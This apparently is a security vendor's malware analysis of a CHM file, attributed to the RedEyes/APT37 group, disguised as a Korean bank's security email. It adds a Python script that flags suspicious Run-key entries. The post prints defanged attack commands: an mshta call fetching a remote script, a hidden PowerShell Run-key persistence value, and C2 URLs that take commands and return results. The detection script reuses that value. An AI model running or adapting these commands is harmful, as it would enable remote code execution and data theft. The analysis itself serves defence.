CHM Malware Disguised as Security Email from a Korean Financial Company: Redeyes (Scarcruft)

The ASEC (AhnLab Security Emergency response Center) analysis team has discovered CHM malware, assumed to have been created by the RedEyes threat group (also known as APT37, ScarCruft), being distributed to Korean users. The team has confirmed that the command used in the “2.3. Persistence” stage of the RedEyes group’s M2RAT malware attack, reported back in February, has the same format as the command used in this attack. This finding and the details of the CHM malware’s operation process are described in this post.

HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)

When the CHM file is executed, it displays a Help screen disguised as a security email from a Korean financial company. The malicious script that exists within the CHM is activated during this process, making it difficult for users to notice. There has been a recent increase in malware distribution using CHM.

Help screen disguised as a security email

The malicious script that is executed is shown below. Like the other CHM malware introduced in the past, it uses a shortcut object (ShortCut). The shortcut object is called through the Click method, and the command under the Item1 entry is executed. This command uses the mshta process to execute an additional script hosted at a specific URL.

  • Executed Command
    mshta.exe hxxp://shacc[.]kr/skin/product/1.html
Malicious script within CHM

The “1.html” file executed through the mshta process contains JavaScript (JS) code. This code is responsible for executing the encoded PowerShell commands. The PowerShell command executed here has a format similar to the command used during the aforementioned M2RAT attack process.

1.html file code
Process tree

An examination of the decoded PowerShell command revealed that, aside from the C2 address, the file name under which the command execution results are saved, and the registry value, the code is the same as the command used back in February. This command is responsible for registering the RUN key to establish persistence, receiving commands from the threat actor’s server, and transmitting the command execution results.

  • RUN Key Registration
    Registry path: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Value name: icxrNpVd
    Value: c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 || mshta hxxp://shacc[.]kr/skin/product/1.html
  • C2
    hxxp://shacc[.]kr/skin/product/mid.php?U=[Computer name]+[Username] // Receives threat actor’s commands
    hxxp://shacc[.]kr/skin/product/mid.php?R=[BASE64-encoded] // Transmits the command execution results
Decoded PowerShell command
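The following triage script is an added example, not code from ASEC or from the malware. It checks exported Run-key entries for the traits of the value listed above (mshta fetching a remote URL, hidden PowerShell, an execution-policy bypass, and the `ping ... || mshta` chain). The rule names, the threshold, and the benign sample entries are assumptions constructed for illustration.

```python
import re

# Matches http(s):// and the defanged hxxp(s):// form used in reports.
URL = r"h(?:tt|xx)ps?://\S+"

# Traits of the Run-key value described above; rule names are this example's own.
RULES = [
    ("mshta_remote_url", re.compile(r"\bmshta(?:\.exe)?\b[^|&]*?" + URL, re.I)),
    ("hidden_powershell",
     re.compile(r"\bpowershell(?:\.exe)?\b.*-w(?:indowstyle)?\s+hidden", re.I)),
    ("execution_policy_bypass", re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    ("ping_then_mshta", re.compile(r"\bping\b[^|]*\|\|\s*mshta", re.I)),
]

def match_rules(data):
    """Return the names of all rules that match one Run-key value's data."""
    return [name for name, rx in RULES if rx.search(data)]

def triage(entries, threshold=2):
    """entries: iterable of (value_name, value_data) pairs from a Run key.

    An entry is reported when mshta is pointed at a URL, or when at least
    `threshold` weaker traits occur together (assumed tuning, adjust locally).
    """
    hits = []
    for name, data in entries:
        matched = match_rules(data)
        if "mshta_remote_url" in matched or len(matched) >= threshold:
            hits.append((name, matched))
    return hits

# Constructed sample export of HKCU\...\CurrentVersion\Run. The last entry is
# the value reported in this post, kept defanged; the others are made up.
SAMPLE_RUN_KEY = [
    ("OneDrive", r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("NightlyBackup", r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ("icxrNpVd", r"c:\windows\system32\cmd.exe /c PowerShell.exe -WindowStyle hidden "
                 r"-NoLogo -NonInteractive -ep bypass ping -n 1 -w 361881 || "
                 r"mshta hxxp://shacc[.]kr/skin/product/1.html"),
]

if __name__ == "__main__":
    for value_name, matched in triage(SAMPLE_RUN_KEY):
        print(value_name, matched)
```

The rules match on the value data rather than the value name, so they do not depend on the specific name or C2 address seen in this sample.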

A system infected with this type of malware can suffer serious damage, since the malware can perform various malicious acts, such as downloading files and exfiltrating information, according to the threat actor’s commands. In particular, malware that targets specific users in Korea may include content on topics of interest to the user to encourage them to execute it, so users should refrain from opening emails from unknown sources and should not execute their attachments. Users should also regularly scan their PCs and update their security products to the latest engine.

[File Detection]
Trojan/CHM.Agent (2023.03.03.03)


Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
